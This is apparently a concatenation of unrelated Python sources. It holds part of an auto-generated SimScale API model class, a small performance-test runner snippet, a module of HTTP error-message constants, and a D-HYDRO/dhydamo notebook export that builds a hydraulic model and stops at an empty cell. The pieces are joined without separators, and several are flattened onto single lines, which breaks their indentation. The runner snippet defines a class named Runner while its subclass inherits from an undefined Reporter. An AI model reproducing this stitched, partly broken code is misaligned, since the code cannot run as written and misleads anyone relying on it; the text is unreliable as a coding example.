target='_blank'>Learn more</a>. Schema name: SymmetryPlaneBC # noqa: E501 :return: The type of this OneOfFrequencyAnalysisBoundaryConditions. 
# noqa: E501 :rtype: str """ return self._type @type.setter def type(self, type): """Sets the type of this OneOfFrequencyAnalysisBoundaryConditions. This boundary condition restrains the displacement of a face in its normal direction in order to represent a symmetry plane of the structure. Use this boundary condition to reduce the model size significantly if the geometry and the loading conditions are symmetric.<br /><br />Important remarks: <br /><ul><li>The solver uses linear relations between all three DOFs to constrian the normal movement, thus overcontraint conditions may appear if the edges of the selected faces are constrained by other displacement boundary conditions.</li><li>If the assigned faces are orthogonal to a global coordinate axes, it is recommended to directly specifiy the symmetry conditions with a <b>Fixed value</b> boundary condition.</li></ul><a href= https://www.simscale.com/docs/simulation-setup/boundary-conditions/symmetry/#symmetry-plane-boundary-condition-fea' target='_blank'>Learn more</a>. Schema name: SymmetryPlaneBC # noqa: E501 :param type: The type of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: str """ if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501 raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501 self._type = type @property def name(self): """Gets the name of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The name of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this OneOfFrequencyAnalysisBoundaryConditions. :param name: The name of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: str """ self._name = name @property def preload(self): """Gets the preload of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The preload of this OneOfFrequencyAnalysisBoundaryConditions. 
# noqa: E501 :rtype: ForcePreload """ return self._preload @preload.setter def preload(self, preload): """Sets the preload of this OneOfFrequencyAnalysisBoundaryConditions. :param preload: The preload of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: ForcePreload """ self._preload = preload @property def topological_reference(self): """Gets the topological_reference of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The topological_reference of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: TopologicalReference """ return self._topological_reference @topological_reference.setter def topological_reference(self, topological_reference): """Sets the topological_reference of this OneOfFrequencyAnalysisBoundaryConditions. :param topological_reference: The topological_reference of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: TopologicalReference """ self._topological_reference = topological_reference @property def spring_stiffness(self): """Gets the spring_stiffness of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The spring_stiffness of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: OneOfElasticSupportBCSpringStiffness """ return self._spring_stiffness @spring_stiffness.setter def spring_stiffness(self, spring_stiffness): """Sets the spring_stiffness of this OneOfFrequencyAnalysisBoundaryConditions. :param spring_stiffness: The spring_stiffness of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: OneOfElasticSupportBCSpringStiffness """ self._spring_stiffness = spring_stiffness @property def displacement(self): """Gets the displacement of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The displacement of this OneOfFrequencyAnalysisBoundaryConditions. 
# noqa: E501 :rtype: DimensionalPartialVectorFunctionLength """ return self._displacement @displacement.setter def displacement(self, displacement): """Sets the displacement of this OneOfFrequencyAnalysisBoundaryConditions. :param displacement: The displacement of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: DimensionalPartialVectorFunctionLength """ self._displacement = displacement @property def rotation(self): """Gets the rotation of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The rotation of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: DimensionalPartialVectorFunctionAngle """ return self._rotation @rotation.setter def rotation(self, rotation): """Sets the rotation of this OneOfFrequencyAnalysisBoundaryConditions. :param rotation: The rotation of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: DimensionalPartialVectorFunctionAngle """ self._rotation = rotation @property def external_point(self): """Gets the external_point of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The external_point of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: DimensionalVectorLength """ return self._external_point @external_point.setter def external_point(self, external_point): """Sets the external_point of this OneOfFrequencyAnalysisBoundaryConditions. :param external_point: The external_point of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: DimensionalVectorLength """ self._external_point = external_point @property def deformation_behavior(self): """Gets the deformation_behavior of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 <p>Choose the deformation behavior of the assigned entity. If <b>deformable</b> is selected, the entitiy is allowed to deform, selecting <b>undeformable</b> leads to a rigid entity.</p> # noqa: E501 :return: The deformation_behavior of this OneOfFrequencyAnalysisBoundaryConditions. 
# noqa: E501 :rtype: str """ return self._deformation_behavior @deformation_behavior.setter def deformation_behavior(self, deformation_behavior): """Sets the deformation_behavior of this OneOfFrequencyAnalysisBoundaryConditions. <p>Choose the deformation behavior of the assigned entity. If <b>deformable</b> is selected, the entitiy is allowed to deform, selecting <b>undeformable</b> leads to a rigid entity.</p> # noqa: E501 :param deformation_behavior: The deformation_behavior of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: str """ allowed_values = ["DEFORMABLE", "UNDEFORMABLE"] # noqa: E501 if self.local_vars_configuration.client_side_validation and deformation_behavior not in allowed_values: # noqa: E501 raise ValueError( "Invalid value for `deformation_behavior` ({0}), must be one of {1}" # noqa: E501 .format(deformation_behavior, allowed_values) ) self._deformation_behavior = deformation_behavior def get_real_child_model(self, data): """Returns the real base class specified by the discriminator""" discriminator_key = self.attribute_map[self.discriminator] discriminator_value = data[discriminator_key] return self.discriminator_value_class_map.get(discriminator_value) def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not 
isinstance(other, OneOfFrequencyAnalysisBoundaryConditions): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, OneOfFrequencyAnalysisBoundaryConditions): return True return self.to_dict() != other.to_dict()
import logging from performance.driver.core.config import Configurable from performance.driver.core.eventbus import EventBusSubscriber class Runner(Configurable, EventBusSubscriber): """ A Run controller controls the overall execution of the test suite. This abstraction allows the tests to continue until enough data are collected for reasonable statistical translation. """ def __init__(self, config, generalConfig, eventbus): """ Initialize reporter """ Configurable.__init__(self, config) EventBusSubscriber.__init__(self, eventbus) self.generalConfig = generalConfig self.logger = logging.getLogger('Reporter<{}>'.format(type(self).__name__)) def dump(self, summarizer): """ Extract data from the summarizer and dump it to the reporter """ pass class ConsoleReporter(Reporter): """ The simplest, console-only reporter """ def dump(self, summarizer): print(summarizer.sum())
# Define custom error messages here.
#
# Each constant is a tuple of (response body, HTTP status code) that request
# handlers return directly as a Flask-style (dict, int) response.

# --- Authentication / authorisation -----------------------------------------
EMAIL_IN_USE = ({'message': 'User with that email already exists'}, 409)
UNAUTHORIZED = (
    {'message': 'Authentication is required to access this resource',
     'type': 'UNAUTHORIZED'}, 401)
BAD_CREDENTIALS = (
    {'message': 'Incorrect username or password', 'type': 'BAD_CREDENTIALS'}, 401)
FORBIDDEN = ({'message': 'Access to this resource is forbidden'}, 403)
# NOTE(review): 418 (I'm a teapot) is a non-standard choice for this case;
# kept for API compatibility -- clients may already depend on it.
RESET_PASSWORD_CODE_NOT_VALID = (
    {'message': 'Valid code is required to reset a password'}, 418)
TOO_MANY_REQUESTS = ({'message': 'Too many requests'}, 429)

# --- Events and translations ------------------------------------------------
EVENT_NOT_FOUND = ({'message': 'No event exists with that ID'}, 404)
EVENT_WITH_KEY_NOT_FOUND = ({'message': 'No event exists with that KEY'}, 404)
EVENT_WITH_TRANSLATION_NOT_FOUND = ({'message': 'Translation for event not found'}, 404)
EVENT_MUST_CONTAIN_TRANSLATION = ({'message': "Event must contain at least one translation for 'name' and 'description'"}, 400)
EVENT_TRANSLATION_MISMATCH = ({'message': "Event must contain same translations for 'name' and 'description'"}, 400)
EVENT_KEY_IN_USE = ({'message': 'Event with that KEY already exists'}, 409)
EVENT_ID_NOT_FOUND = ({'message': 'Event ID not found.'}, 404)

# --- References -------------------------------------------------------------
# NOTE(review): 'REFRERENCE' is misspelled but the name is part of the public
# module interface -- renaming it would break importers.
REFRERENCE_REQUEST_WITH_TOKEN_NOT_FOUND = ({'message': 'No Reference Request exists with that Token'}, 404)
DUPLICATE_REFERENCE_SUBMISSION = ({'message': 'Reference Already submitted for this Request '}, 409)
REFERENCE_REQUEST_NOT_FOUND = (
    {'message': 'No response found for the given event and user'}, 404)

# --- Application forms and responses ----------------------------------------
SECTION_NOT_FOUND = ({'message': 'No section exists with that Event ID'}, 404)
QUESTION_NOT_FOUND = (
    {'message': 'No question exists with that Event ID'}, 404)
FORM_NOT_FOUND = ({'message': 'No form exists with that Event ID'}, 404)
FORM_NOT_FOUND_BY_ID = ({'message': 'No application form exists with that Application Form ID'}, 404)
RESPONSE_NOT_FOUND = (
    {'message': 'No response found for the given event and user'}, 404)
RESPONSE_ALREADY_SUBMITTED = ({'message': 'A response has already been submitted'}, 400)
DUPLICATE_RESPONSE = ({'message': 'A response has already been submitted for this application form'}, 409)
UPDATE_CONFLICT = (
    {'message': 'The requested update conflicts with the existing resource'}, 409)
APPLICATIONS_CLOSED = (
    {'message': 'Applications are now closed'}, 403)
BAD_CONFIGURATION = ({'message': 'There is an error with the form configuration'}, 500)

# --- Infrastructure ---------------------------------------------------------
DB_NOT_AVAILABLE = ({'message': 'Unable to access the database'}, 500)
EMAIL_NOT_SENT = (
    {'message': 'Email failed to send'}, 500)

# --- Accounts and email verification ----------------------------------------
EMAIL_NOT_VERIFIED = ({'message': 'The email address is not verified'}, 422)
# NOTE(review): 419 is not a registered HTTP status code; kept for
# API compatibility.
EMAIL_VERIFY_CODE_NOT_VALID = (
    {'message': 'Valid code is required to verify email'}, 419)
USER_NOT_FOUND = ({'message': 'No user exists with that email'}, 404)
RESET_PASSWORD_CODE_EXPIRED = (
    {'message': 'The password reset request has expired'}, 400)
FILE_SIZE_EXCEEDED = ({'message': 'File size exceeded'}, 400)
USER_DELETED = ({'message': 'This account has been deleted'}, 404)
ADD_VERIFY_TOKEN_FAILED = (
    {'message': 'Unable to add verification token.'}, 500)
MISSING_PASSWORD = (
    {'message': 'Password not provided', 'type': 'MISSING_CREDENTIALS'}, 400)
MISSING_DATE_OF_BIRTH = (
    {'message': 'Missing date of birth. Please update your user profile.'}, 400)
ERROR_UPDATING_USER_PROFILE = (
    {'message': 'Exception updating user profile.'}, 500)
ADD_EVENT_ROLE_FAILED = (
    {'message': 'Unable to add event role for the user_id and event_id.'}, 500)
POLICY_NOT_AGREED = (
    {'message': 'Privacy policy must be agreed to before continuing.'}, 400)
POLICY_ALREADY_AGREED = (
    {'message': 'Privacy policy has already been agreed to.'}, 400)

# --- Reviews ----------------------------------------------------------------
REVIEW_RESPONSE_NOT_FOUND = ({'message': 'No review response found.'}, 404)
REVIEW_FORM_NOT_FOUND = ({'message': "No review form found for the event"}, 404)
REVIEW_ALREADY_COMPLETED = ({'message': "Can't delete reviewer, the review has already been completed"}, 400)

# --- Invited guests ---------------------------------------------------------
ADD_INVITED_GUEST_FAILED = (
    {'message': 'Unable to add invited guest.'}, 500)
INVITED_GUEST_FOR_EVENT_EXISTS = (
    {'message': 'Invited guest already exists for this event.'}, 409)
VERIFY_EMAIL_INVITED_GUEST = (
    {'message': 'Unable to verify email of invited guest.'}, 500)
# FIX: message previously read "was added added to the database" (duplicated
# word); the duplicate has been removed.
INVITED_GUEST_EMAIL_FAILED = (
    {'message': 'The invited guest was added to the database, but the email failed to send. You may want to contact them manually.'}, 500)

# --- Offers -----------------------------------------------------------------
VERIFY_EMAIL_OFFER = (
    {'message': 'Unable to verify email of an offer.'}, 500)
OFFER_EXPIRED = ({'message': 'Your offer has expired'}, 403)
ADD_OFFER_FAILED = (
    {'message': 'Unable to add an offer.'}, 500)
OFFER_NOT_FOUND = (
    {'message': 'No offer found for the given id'}, 404)
OFFER_NOT_ACCEPTED = (
    {'message': 'Offer has not been accepted'}, 409)
DUPLICATE_OFFER = (
    {'message': 'An offer already exists for the user_id and event_id'}, 409)

# --- Registration -----------------------------------------------------------
REGISTRATION_FORM_NOT_FOUND = (
    {'message': 'No registration form found for the given event and offer'}, 404)
REGISTRATION_SECTION_NOT_FOUND = (
    {'message': 'No registration section found for the given id'}, 404)
REGISTRATION_QUESTION_NOT_FOUND = (
    {'message': 'No registration question found for the given id'}, 404)
ADD_REGISTRATION_FORM_FAILED = (
    {'message': 'Unable to add registration form.'}, 500)
ADD_REGISTRATION_SECTION_FAILED = (
    {'message': 'Unable to add registration section.'}, 500)
ADD_REGISTRATION_QUESTION_FAILED = (
    {'message': 'Unable to add registration question.'}, 500)
REGISTRATION_NOT_FOUND = (
    {'message': 'Registration not found. Please register first.'}, 404)

# --- Invitation letters -----------------------------------------------------
ADD_INVITATION_REQUEST_FAILED = (
    {'message': 'Unable to add invitation letter request.'}, 500)
TEMPLATE_NOT_FOUND = (
    {'message': 'No template found for the given parameters'}, 404)
CREATING_INVITATION_FAILED = (
    {'message': 'Invitation Letter creation failed'}, 502)
SENDING_INVITATION_FAILED = (
    {'message': 'Invitation Letter failed to send'}, 502)

# --- Attendance and outcomes ------------------------------------------------
ATTENDANCE_ALREADY_CONFIRMED = (
    {'message': 'Attendance has already been confirmed for this user and event.'}, 400)
ATTENDANCE_NOT_FOUND = (
    {'message': 'Attendance not found.'}, 404)
OUTCOME_NOT_FOUND = (
    {'message': 'No outcome found for the given event'}, 404)
OUTCOME_STATUS_NOT_VALID = (
    {'message': 'Invalid outcome status specified'}, 400)
CANDIDATE_REJECTED = (
    {'message': 'The candidate has already been rejected for the event'}, 400)

# --- Tags and integration testing -------------------------------------------
TAG_NOT_FOUND = (
    {'message': 'No tag found with the given id'}, 404)
FAILED_CREATE_INTEGRATION_TEST_USER = (
    {'message': 'Failed to create integration test user.'}, 500)
FAILED_DELETE_INTEGRATION_TEST_USER = (
    {'message': 'Failed to delete integration test user'}, 500)
#!/usr/bin/env python
# coding: utf-8

# ## Overview of functionalities
#
# This notebook gives an overview of the functionalities of the dhydamo module.
#
# For install instructions see: https://github.com/openearth/dhydamo#installation
#
# Note that the old version of the package (delft3dfmpy) will not be updated anymore and won't be available through GitHub. New features (RR-modelling, additional hydraulic structures, etc.) will be implemented in dhydamo.
#
# Furthermore, it should be noted that recently added features were tested with dummy-data, which is included with this package. The generated model is, therefore, not necessarily a correct hydraulic representation, as some dummy structures were added and existing structures moved and/or adjusted. The purpose of this notebook is solely to illustrate the usage of the dhydamo module.

# ## Release notes
# The following aspects are new compared to the previous version:
# - culvert length is derived from the HyDAMO setting in the GML file instead of the line geometry;
# - spelling of parametrised is now consistent, i.e., "dflowfmmodel.paratemeterised" would now give an error;
# - pumps now expect their margins in m+NAP instead of cm. I.e., the margins are now used directly to set the start/stoplevelsuctionside. Previously they were related to the 'streefwaarde';
# - Boundary conditions can be added to the model as 'dfmmodel.external_forcings.io.from_hydamo(hydamo.boundary_conditions)' instead of running 'add_boundary_condition' in a loop. This does not work (yet) for time series, only for constant boundary conditions
# - structures bridge, universal weir, compound structure and orifice are added.
# - the module was breaking down when pandas was updated to version 1.0.1. Workarounds were implemented to avoid this.
# - functionality has been implemented to generate also the RR-components of a coupled RR-FM D-HYDRO model.
# In[1]: # Basis import os import sys import shutil import numpy as np # Importing relevant classes from delft3dfmpy from delft3dfmpy import DFlowFMModel, HyDAMO, Rectangular, DFlowFMWriter from delft3dfmpy import DFlowRRModel, DFlowRRWriter from delft3dfmpy.datamodels.common import ExtendedGeoDataFrame #from delft3dfmpy import * # For reading SOBEK results as boundary conditions # hkvsobekpy requires the modules fire and tqdm, install these (conda install fire tqdm) import hkvsobekpy # shapefiles IO import geopandas as gpd # Import csv import pandas as pd # Geometries from shapely.geometry import Polygon, LineString # Plotting import matplotlib.pyplot as plt from matplotlib.collections import LineCollection get_ipython().run_line_magic('matplotlib', 'inline') # ### Read HYDAMO # # Note: the data are also added in zipped format, to be unzipped in case of errors with the downloaded gml-files. # # In the code section below the different parts or the HyDAMO gml are added. For more info on how to import the different elements from the HyDAMO gml, see: https://hkvconfluence.atlassian.net/wiki/spaces/DHYD/overview # # The general steps for importing the HyDAMO files are: # - Read the objects from the GML file. # - Snap the structures to the branches # - Remove non-snapped structures, perhaps because the distance to the nearest branch was too large. # # A few remarks: # - The converter requires a number of features with a specfic name. If the name in the gml does not match this name, it can be converted with the 'column_mapping' # - The branch or structure data can also be loaded from shapefiles. Note that shapefiles have a max column length o f10 characters, so probably a lot of column_mapping is necessary. # Change this path to access the data! 
# In[2]:


# path ('pad') to the package containing the dummy-data
pad = 'D:/3640.20/delft3dfmpy.git/trunk/data/'


# In[3]:


# initialize the class, clipped to the pilot extent polygon
hydamo = HyDAMO(extent_file=pad+'gis/selectie_pilot.shp')

# Branches
hydamo.branches.read_gml(pad+'gml/hydroobject.gml', index_col='code', clip=hydamo.clipgeo)
hydamo.branches['ruwheidstypecode'] = 4

# read cross sections from GML, grouped per profile and ordered by point number
hydamo.crosssections.read_gml(pad+'gml/dwarsprofiel.gml',
                              column_mapping={'ruwheidswaardelaag': 'ruwheidswaarde'},
                              index_col='profielcode',
                              groupby_column='profielcode',
                              order_column='codevolgnummer')
hydamo.crosssections.snap_to_branch(hydamo.branches, snap_method='intersecting')
# drop profiles that could not be snapped to a branch
hydamo.crosssections.dropna(axis=0, inplace=True, subset=['branch_offset'])
hydamo.crosssections = hydamo.crosssections.drop(ExtendedGeoDataFrame(geotype=LineString), 'code',
                                                 index_col='profielcode', axis=1)
hydamo.crosssections.rename(columns={'profielcode': 'code'}, inplace=True)

# Parametrised profiles (Dutch: 'legger')
hydamo.parametrised_profiles.read_gml(pad+'gml/NormGeparametriseerdProfiel.gml',
                                      column_mapping={'ruwheidswaardelaag': 'ruwheidswaarde'})
hydamo.parametrised_profiles.snap_to_branch(hydamo.branches, snap_method='intersecting')
hydamo.parametrised_profiles.dropna(axis=0, inplace=True, subset=['branch_offset'])

# Bridges
hydamo.bridges.read_gml(pad+'gml/brug.gml')
hydamo.bridges.snap_to_branch(hydamo.branches, snap_method='overal', maxdist=5)
hydamo.bridges.dropna(axis=0, inplace=True, subset=['branch_offset'])

# Culverts
hydamo.culverts.read_gml(
    pad+'gml/duikersifonhevel.gml',
    index_col='code',
    column_mapping={'vormkoker': 'vormcode'},
    clip=hydamo.clipgeo
)
hydamo.culverts.snap_to_branch(hydamo.branches, snap_method='ends', maxdist=5)
hydamo.culverts.dropna(axis=0, inplace=True, subset=['branch_offset'])

# Remove culverts that slow down the computation or belong to pumping stations
duikers_rekentijd = ['RS372-KDU3','RS375-KDU2','RS373-KDU7','RS373-KDU20','RS373-KDU22','RS373-KDU19']
duikers_gemalen = ['OWL32921-KDU3','RS375-KDU6']
hydamo.culverts = hydamo.culverts.drop(ExtendedGeoDataFrame(geotype=LineString), duikers_rekentijd,
                                       index_col='code', axis=0)
hydamo.culverts = hydamo.culverts.drop(ExtendedGeoDataFrame(geotype=LineString), duikers_gemalen,
                                       index_col='code', axis=0)

# Weirs (including universal weirs)
hydamo.weirs.read_gml(pad+'gml/stuw.gml')
hydamo.weirs.snap_to_branch(hydamo.branches, snap_method='overal', maxdist=10)
hydamo.weirs.dropna(axis=0, inplace=True, subset=['branch_offset'])

# Orifices
hydamo.orifices.read_gml(pad+'gml/onderspuier.gml')
hydamo.orifices.snap_to_branch(hydamo.branches, snap_method='overal', maxdist=2)
hydamo.orifices.dropna(axis=0, inplace=True, subset=['branch_offset'])

# Closing devices ('afsluitmiddelen'), e.g. non-return valves ('terugslagkleppen')
hydamo.afsluitmiddel.read_gml(pad+'gml/afsluitmiddel.gml', index_col='code')

# Laterals (imported from shapefile)
hydamo.laterals.read_shp(pad+'sobekdata/Sbk_S3BR_n.shp',
                         column_mapping={'ID ': 'code',
                                         'NAME ': 'name',
                                         'X ': 'X',
                                         'Y ': 'Y'})
hydamo.laterals.snap_to_branch(hydamo.branches, snap_method='overal', maxdist=5)
hydamo.laterals.dropna(axis=0, inplace=True, subset=['branch_offset'])

# Pumps: pumping stations ('gemalen'), pumps and their control ('sturing')
hydamo.gemalen.read_gml(pad+'gml/gemaal.gml', index_col='code', clip=hydamo.clipgeo)
hydamo.pumps.read_gml(pad+'gml/pomp.gml', index_col='code', clip=hydamo.clipgeo)
hydamo.pumps.snap_to_branch(hydamo.branches, snap_method='overal', maxdist=5)
# scale pump capacity by 60 -- presumably a unit conversion (e.g. per-second
# to per-minute); TODO confirm against the HyDAMO/D-Flow FM unit conventions
hydamo.pumps['maximalecapaciteit'] *= 60
hydamo.sturing.read_gml(pad+'gml/sturing.gml', index_col='code')


# Plot the model with branches, cross sections and structures. Note that compound structures are not plotted here as they do not have a geometry on their own; they are composed from their sub-structures that do have a geometry and are plotted here.
# In[4]: plt.rcParams['axes.edgecolor'] = 'w' fig, ax = plt.subplots(figsize=(10, 10)) ax.fill(*hydamo.clipgeo.exterior.xy, color='w', alpha=0.5) ax.xaxis.set_visible(False) ax.yaxis.set_visible(False) ax.set_xlim(139600, 142400) ax.set_ylim(391700, 395600) achtergrond = plt.imread(pad+'gis/achtergrond.png') ax.imshow(achtergrond, extent=(139517.12, 142957.76, 391606.8, 395907.6), interpolation='lanczos') hydamo.branches.plot(ax=ax, label='Channel') hydamo.crosssections.plot(ax=ax, color='C3', label='Cross section') hydamo.culverts.centroid.plot(ax=ax, color='darkgreen', label='Culvert', markersize=20, zorder=10) hydamo.weirs.centroid.plot(ax=ax, color='C1', label='Weir', markersize=25, zorder=10) hydamo.bridges.plot(ax=ax,color='red',label='Bridge',markersize=20,zorder=10) hydamo.orifices.plot(ax=ax,color='black',label='Orifice',markersize=20,zorder=10) hydamo.pumps.plot( ax=ax, color='C4', label='Pump', marker='s', markersize=125, zorder=10, facecolor='none', linewidth=2.5) ax.legend() fig.tight_layout() # ### Generate the D-HYDRO FM schematisation # #### Create the 1D network # Convert the geometries to D-HYDRO schematisation: # # Start with importing the structures (from HyDAMO in this case), since the position of the structure can be used in defining the position of the 1d nodes. # # Structures can also be added without the HyDAMO imports. One weir is added manually, but this can be done for all implemented structures. # # Note that for importing most structures multiple gml-files are needed. For more info on how to add structures (directly or from HyDAMO), see: https://hkvconfluence.atlassian.net/wiki/spaces/DHYD/overview. # # - for weirs, a corresponding profile is looked up in the crossections. If one is found (either a YZ or a parametrised profile) the weir is implemented as a universal weir. If it is not found, a regular (rectangular) weir will be used. The cross-section should contain a 'codegeralateerdobject' containing the ID of the universal weir. 
# - culverts can also use an 'afsluitmiddel'; if one is coupled for a specific culvert and its type is 5 (terugslagklep) the flow direction is set 'positive' instead of 'both'. # - bridges need an associated crosssection (through the field 'codegerelateerdobject' in the cross-section); this can be either 'YZ' or 'parametrised'. The profiles are then processed so a suitable cross-section for a bridge is created; # - pumps are composed from 'gemalen', 'pompen' and 'sturing'. # # In most cases, these 'extra' arguments are optional, i.e. they are not required and can be left out. Some are required: # - pumps really need all 3 objects (gemalen, pompen en sturing); # - bridges really need a profile (either 'crosssections' or 'parametrised_profiles' needs to contain a field 'codegerelateerdobject' that points to each bridge). # # For more info on the structure definitions one is referred to the D-Flow FM user manual: https://content.oss.deltares.nl/delft3d/manuals/D-Flow_FM_User_Manual.pdf. # # Note that orifices do not yet have an appropriate/definitive definition in HYDAMO. To be able to use it, we now use a separate GML-definition ('onderspuier") but possibly this will be integrated in the definition for weirs. To be continued. 
# # In[5]: dfmmodel = DFlowFMModel() # Collect structures dfmmodel.structures.io.weirs_from_hydamo(hydamo.weirs, yz_profiles=hydamo.crosssections, parametrised_profiles=hydamo.parametrised_profiles) dfmmodel.structures.io.culverts_from_hydamo(hydamo.culverts, hydamo.afsluitmiddel) dfmmodel.structures.io.bridges_from_hydamo(hydamo.bridges, yz_profiles=hydamo.crosssections, parametrised_profiles=hydamo.parametrised_profiles) dfmmodel.structures.io.orifices_from_hydamo(hydamo.orifices) dfmmodel.structures.io.pumps_from_hydamo(pompen=hydamo.pumps, sturing=hydamo.sturing, gemalen=hydamo.gemalen) # Add a weir manually (equivalent functions exist for all structures): dfmmodel.structures.add_weir( id='extra_weir', branchid='riv_RS1_1810', chainage=950.0, crestlevel=8.00, crestwidth=7.5, corrcoeff=1.0 ) # Compound structures are composed of other structures and will not be implemented as such in HyDAMO. D-Flow FM simply needs an ID for every compound structure and a list of structures it should be composed of. They should be snapped to the same branch but not necessarily to the exact same location. # # To use, provide a list of ID's of compound structures, and along with, for every compound structure, a nested list of sub-structures. If there are many, these can be read from files (for example). # In[6]: cmpnd_ids = ['cmpnd_1','cmpnd_2'] cmpnd_list = [['Orifice_Test1','UWeir_Test2'], ['UWeir_Test2','RS1-KBR31']] dfmmodel.structures.io.compound_structures(cmpnd_ids, cmpnd_list) # After this add the branches and generate a grid. # In[7]: # Create a 1D schematisation dfmmodel.network.set_branches(hydamo.branches) dfmmodel.network.generate_1dnetwork(one_d_mesh_distance=40.0, seperate_structures=True) # Add cross sections. Here two hydamo files are used. First the imported cross sections. If after this there are branch objects left without a cross sections, it is derived from the norm parametrised profile (Dutch: legger). 
# In[8]:


# Add cross sections from hydamo
dfmmodel.crosssections.io.from_hydamo(
    dwarsprofielen=hydamo.crosssections,
    parametrised=hydamo.parametrised_profiles,
    branches=hydamo.branches
)

print(f'{len(dfmmodel.crosssections.get_branches_without_crosssection())} branches are still missing a cross section.')
print(f'{len(dfmmodel.crosssections.get_structures_without_crosssection())} structures are still missing a cross section.')


# If there are still missing cross sections left, add a default one. To do so add a cross section definition, and assign it with a vertical offset (shift).

# In[9]:


# Set a default cross section for branches/structures without one
default = dfmmodel.crosssections.add_rectangle_definition(
    height=5.0, width=5.0, closed=False, roughnesstype='Strickler', roughnessvalue=30)
dfmmodel.crosssections.set_default_definition(definition=default, shift=5.0)


# #### Add a 2D mesh
# To add a mesh, currently 2 options exist:
# 1) the converter can generate a relatively simple, rectangular mesh, with a rotation or refinement. Note that rotation _and_ refinement is currently not possible. In the section below we generate a refined 2D mesh with the following steps:
#
# - Generate grid within a polygon. The polygon is the extent given to the HyDAMO model.
# - Refine along the main branch
# - Determine altitude from a DEM.

# In[10]:


# Create mesh object
mesh = Rectangular()
cellsize = 25

# Generate mesh within model bounds
mesh.generate_within_polygon(hydamo.clipgeo, cellsize=cellsize, rotation=0)

# Refine the model (2 steps) along the main branch. To do so we generate a buffer around the main branch.
buffered_branch = hydamo.branches.loc[['riv_RS1_1810', 'riv_RS1_264'], 'geometry'].unary_union.buffer(10)
mesh.refine(polygon=[buffered_branch], level=[2], cellsize=cellsize)

# Determine the altitude from a digital elevation model
# rasterpath = '../gis/AHNdommel_clipped.tif'
# mesh.altitude_from_raster(rasterpath)

# The full DEM is not added to this notebook. Instead a constant bed level is used
mesh.altitude_constant(15.0)

# Add to schematisation
dfmmodel.network.add_mesh2d(mesh)


# 2) a more complex mesh can be created in other software (such as SMS) and then imported in the converter: (uncomment to activate)

# In[11]:


#from dhydamo.core.mesh2d import Mesh2D
#mesh = Mesh2D()

# import the geometry
#mesh.geom_from_netcdf(r'T:\2Hugo\Grid_Roer_net.nc')

# fill every cell with an elevation value
#mesh.altitude_from_raster(rasterpath)

# and add to the model
#dfmmodel.network.add_mesh2d(mesh)


# #### Add the 1D-2D links
# For linking the 1D and 2D model, three options are available:
# 1. Generating links from each 1d node to the nearest 2d node.
# 2. Generating links from each 2d node to the nearest 1d node (intersecting==True)
# 3. Generating links from each 2d node to the nearest 1d node, while not allowing the links to intersect other cells (intersecting==True).
#
# Intersecting indicates whether or not the 2D cells cross the 1D network (lateral versus embedded links).
# So, option 3 is relevant when there is no 2d mesh on top of the 1d mesh: the lateral links.
#
# Note that for each option a maximum link length can be chosen, to prevent creating long (and perhaps unrealistic) links.
# In[12]:


# Clear any previously generated 1D-2D links before (re)generating them
del dfmmodel.network.links1d2d.faces2d[:]
del dfmmodel.network.links1d2d.nodes1d[:]
dfmmodel.network.links1d2d.generate_1d_to_2d(max_distance=50)


# In[13]:


fig, ax = plt.subplots(figsize=(13, 10))
ax.set_aspect(1.0)

segments = dfmmodel.network.mesh2d.get_segments()
ax.add_collection(LineCollection(segments, color='0.3', linewidths=0.5, label='2D-mesh'))

links = dfmmodel.network.links1d2d.get_1d2dlinks()
ax.add_collection(LineCollection(links, color='k', linewidths=0.5))
ax.plot(links[:, :, 0].ravel(), links[:, :, 1].ravel(), color='k', marker='.', ls='', label='1D2D-links')

for i, p in enumerate([buffered_branch]):
    # only label the first polygon so the legend has a single entry
    ax.plot(*p.exterior.xy, color='C3', lw=1.5, zorder=10, alpha=0.8, label='Refinement buffer' if i==0 else None)

hydamo.branches.plot(ax=ax, color='C0', lw=2.5, alpha=0.8, label='1D-mesh')

ax.legend()

ax.set_xlim(140900, 141300)
ax.set_ylim(393400, 393750);


# ### Boundary conditions for FM
#
# Add boundary conditions to external forcings from a SOBEK time series.

# In[14]:


bcs = pd.read_csv(pad+'sobekdata/boundaryconditions.csv', sep=';', index_col=0)
bcs.index = pd.to_datetime(bcs.index)


# In[15]:


